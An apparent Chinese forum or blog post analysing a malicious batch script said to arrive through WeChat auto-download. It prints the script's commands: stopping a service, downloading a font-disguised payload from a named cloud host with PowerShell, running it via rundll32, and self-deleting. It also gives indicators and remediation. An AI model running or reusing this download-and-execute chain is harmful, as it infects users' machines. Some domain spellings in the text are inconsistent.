关于微信自动下载bat文件 导致pubg被封解决办法

关于微信自动下载bat文件 导致pubg被封解决办法

注；不是pubg封号申述解封办法

恶意批处理脚本，执行以下操作：

1.停止服务：

sc stop MessageTransfer >nul 2>&1

该命令尝试停止名为 MessageTransfer 的服务，并屏蔽所有输出和错误信息。

2.等待2秒：

timeout /t 2 /nobreak >nul

这会让脚本暂停 2 秒，并且不允许用户跳过等待（/nobreak）。

3.通过 PowerShell 下载文件：

cmd /c powershell -Command "Invoke-WebRequest 'xp-1257917365.xp-1257917365.cos.ap-shanghai.myqcloud.com/RN2.TTF' -OutFile TTF"

该命令使用 PowerShell 下载一个文件（RN2.TTF）并将其保存在系统的临时文件夹中。

4.执行下载的文件：

cmd /c start "" /b rundll32exe %TEMP%\RN2.TTF,Start

它试图使用 rundll32.exe 执行下载的 RN2.TTF 文件，虽然 .TTF 文件通常是字体文件，但它可以被当作 DLL 文件执行。

5.自删除命令：

rem 自删除命令

del "%~f0"

最后，脚本会自我删除（%~f0 表示脚本本身的完整路径）。

总结：

该脚本执行的主要步骤如下：

1. 停止 MessageTransfer 服务：

脚本首先停止名为 MessageTransfer 的服务，并屏蔽所有输出和错误信息，同时不允许用户跳过等待时间。

2.下载恶意文件：

使用 PowerShell 从远程 URL (xp-1257917365.cos.ap-shanghai.myqcloud.com/RN2.TTF) 下载文件，并将其保存到用xp-1257917365.cos.ap-shanghai.myqcloud,com/RN2.TTF) TTF。

3.执行 .TTF 文件：

通过 rundll32.exe 执行下载的文件，尽管 .TTF 文件通常是字体文件，但它可以被当作 DLL 文件执行，可能包含恶意代码。

4.自我删除：

最后，脚本会删除自己，清除痕迹以避免被检测。

风险：

.TTF文件可能伪装成字体，但实际是包含恶意代码的负载，执行后导致系统感染或安全问题。

线索：

1.动态域名：xp-1257917365.cos.ap-shanghai.myqclou.com

2.TLS协议 地址目的IP：112.86.231.33:443

建议：重装系统格式化磁盘文件，关闭微信文件自动下载。

文件释放地址：

C:\Users\Administrator[以自身计算机用户名为准]\AppData\Local\Temp 查看是否存在RN2命名的TFF文件。

没有用户交互行为是不可能存在自动运行！